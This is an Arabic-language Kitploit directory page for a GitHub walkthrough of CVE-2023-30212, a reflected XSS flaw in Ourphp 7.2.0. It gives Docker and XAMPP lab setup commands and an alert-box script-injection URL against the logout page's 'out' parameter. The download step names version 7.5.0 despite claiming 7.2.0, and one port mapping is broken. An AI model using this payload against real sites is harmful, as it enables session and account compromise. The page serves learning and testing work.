Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-30212 — دليل استغلال خطوة بخطوة لـ CVE-2023-30212، ثغرة XSS في Ourphp 7.2.0، مع إعداد Docker وعرض حقن الحمولة. | Kitploit
أدوات/GitHubGitHub/kai-iszz/cve-2023-30212
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubkai-iszz/cve-2023-30212

CVE-2023-30212

دليل استغلال خطوة بخطوة لـ CVE-2023-30212، ثغرة XSS في Ourphp 7.2.0، مع إعداد Docker وعرض حقن الحمولة.

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-30212

استغلال ثغرة أمنية في Ourphp الإصدار 7.2.0 والمعروفة أيضًا باسم CVE 2023 30212

الخطوة 1. قم بتنزيل وتثبيت Docker على نظامك (ملاحظة). أستخدم Docker لأنه سريع وسهل لتثبيت ubuntu.

الخطوة 2. إعداد بيئة Docker

root@kitploit:~
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash

الخطوة 3. تثبيت خادم الويب و php & mysql. سأقوم بتثبيت خادم xampp لهذا الغرض.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run 
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start

الخطوة 4. تنزيل Ourphp الإصدار 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775

الخطوة 5. إعداد Ourphp على المتصفح افتح متصفحك وأدخل localhost أو 127.0.0.1 اتبع التعليمات وقم بتثبيت Ourphp.

الخطوة 6. استغلال الثغرة الأمنية يحتوي الإصدار 7.2.0 من Ourphp على ثغرة أمنية من نوع XSS (Cross-Site Scripting). للتخفيف من الثغرة الأمنية في الملف /client/manage/ourphp_out.php الذي يسمح بتنفيذ كود XSS،

تحتاج إلى تعديل الكود. تنشأ الثغرة عندما يتم تعيين المعامل "ourphp_admin" إلى "logout"، ويتم عرض المتغير القابل للتحكم "out".

يمكن للمهاجمين استغلال ذلك عن طريق حقن حمولة مثل "".

root@kitploit:~
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

Screenshot 2023-05-29 135740

تنزيل الأداة